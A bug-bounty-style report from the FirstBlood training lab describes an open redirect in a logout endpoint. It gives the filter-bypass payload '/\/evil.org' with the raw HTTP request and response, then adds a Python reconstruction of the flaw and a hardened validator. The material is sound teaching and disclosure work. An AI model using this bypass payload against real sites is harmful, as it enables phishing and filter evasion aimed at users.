FirstBlood-#92 — Open redirect at http://firstbloodhackers.com:49330/drpanel/logout.php
This issue was discovered on FirstBlood v1
On 2021-05-10, 0xconft Level 5 reported:
Hi there,
I found an open redirect on your website at the /drpanel/logout.php endpoint in the ref parameter. There's a filter in place where it must start with / and // is also filtered, but I ended up bypassing this with the payload "/\/evil.org", which is reflected as "//evil.org" in the Location header and thus redirects the victim to evil.org. An example of the impact caused by this vulnerability is that it can be combined with an SSRF attack to bypass a filter, or it can be used for phishing.
PoC
http://firstbloodhackers.com:49330/drpanel/logout.php?ref=/\/evil.org
Request
GET /drpanel/logout.php?ref=/\/evil.org HTTP/1.1
Host: firstbloodhackers.com:49330
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://firstbloodhackers.com:49330/drpanel/index.php
Cookie: drps=5a5cfb7c6047d6dc8dbc411b2
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 302 Found
Server: nginx
Date: Mon, 10 May 2021 06:19:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: //evil.org
Content-Length: 0
P4 Low
Endpoint: /drpanel/logout.php
Parameter: ref
Payload: /\/evil.org
FirstBlood ID: 1
Vulnerability Type: Open Redirect
There is an open URL redirect vulnerability on /drpanel/logout.php. The code expects the ref parameter to start with / and rejects values beginning with //, so redirects to external domains should not be possible, but the check runs on the raw value and the backslash is stripped afterwards: ref=/\/evil.org passes the check and is emitted as Location: //evil.org, a protocol-relative URL that the browser resolves to http://evil.org.
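The following is an added example, not code from the report or from the FirstBlood application (whose logout.php source is not shown). It reconstructs the check-then-transform pattern the report implies (validate the raw ref, then strip backslashes, modelled on PHP's stripslashes; this is an assumption), shows how the browser resolves the resulting protocol-relative Location, and contrasts it with a hardened validator that normalises before checking and only ever returns a same-origin path. The default landing page /drpanel/index.php is taken from the Referer in the report; the function names are hypothetical.

```python
from typing import Optional
from urllib.parse import urljoin, urlsplit

# Base URL of the vulnerable endpoint, taken from the report.
BASE = "http://firstbloodhackers.com:49330/drpanel/logout.php"
DEFAULT_LANDING = "/drpanel/index.php"


def naive_filter(ref: str) -> Optional[str]:
    """Hypothetical reconstruction of the vulnerable logic.

    The filter is applied to the raw value (must start with '/', must not
    start with '//'), and only afterwards are backslashes stripped, as
    PHP's stripslashes() would do. Because the transformation happens after
    the check, '/\\/evil.org' passes and becomes '//evil.org'.
    Returns the value that would be placed in the Location header, or None
    if the filter rejects it.
    """
    if not ref.startswith("/") or ref.startswith("//"):
        return None
    return ref.replace("\\", "")  # transformation after validation: the bug


def resolve_location(base: str, location: str) -> str:
    """Resolve a Location header the way a browser does (RFC 3986 join).

    A protocol-relative '//evil.org' keeps the scheme of the base URL but
    replaces the host, which is exactly why the bypass is exploitable.
    """
    return urljoin(base, location)


def safe_redirect(ref: str, default: str = DEFAULT_LANDING) -> str:
    """Hardened validator: canonicalise first, then validate, then allow-list.

    Anything that is not an absolute, same-origin path falls back to
    `default`. Never redirect to the raw user-supplied value.
    """
    # 1. Canonicalise before checking. Browsers and many servers treat '\'
    #    as '/', so the check must see the same form the client will.
    candidate = ref.replace("\\", "/")

    # 2. Reject CR/LF/NUL to prevent header injection into Location.
    if any(c in candidate for c in "\r\n\x00"):
        return default

    # 3. Exactly one leading slash: '/path' is local, '//host' is not.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default

    # 4. Belt and braces: the parsed form must carry no scheme or authority.
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return default

    return candidate


if __name__ == "__main__":
    payload = "/\\/evil.org"  # the report's payload: /\/evil.org
    leaked = naive_filter(payload)
    print("vulnerable filter emits Location:", leaked)
    print("browser lands on:", resolve_location(BASE, leaked))
    print("hardened validator returns:", safe_redirect(payload))
```

Running the block reproduces the report: the naive filter emits `//evil.org`, which a browser resolves against the base URL to `http://evil.org`, while the hardened validator falls back to the default landing page. The order of operations is the lesson: any normalisation or decoding the server performs on ref (stripping backslashes, URL-decoding, trimming) must happen before the check, not after it.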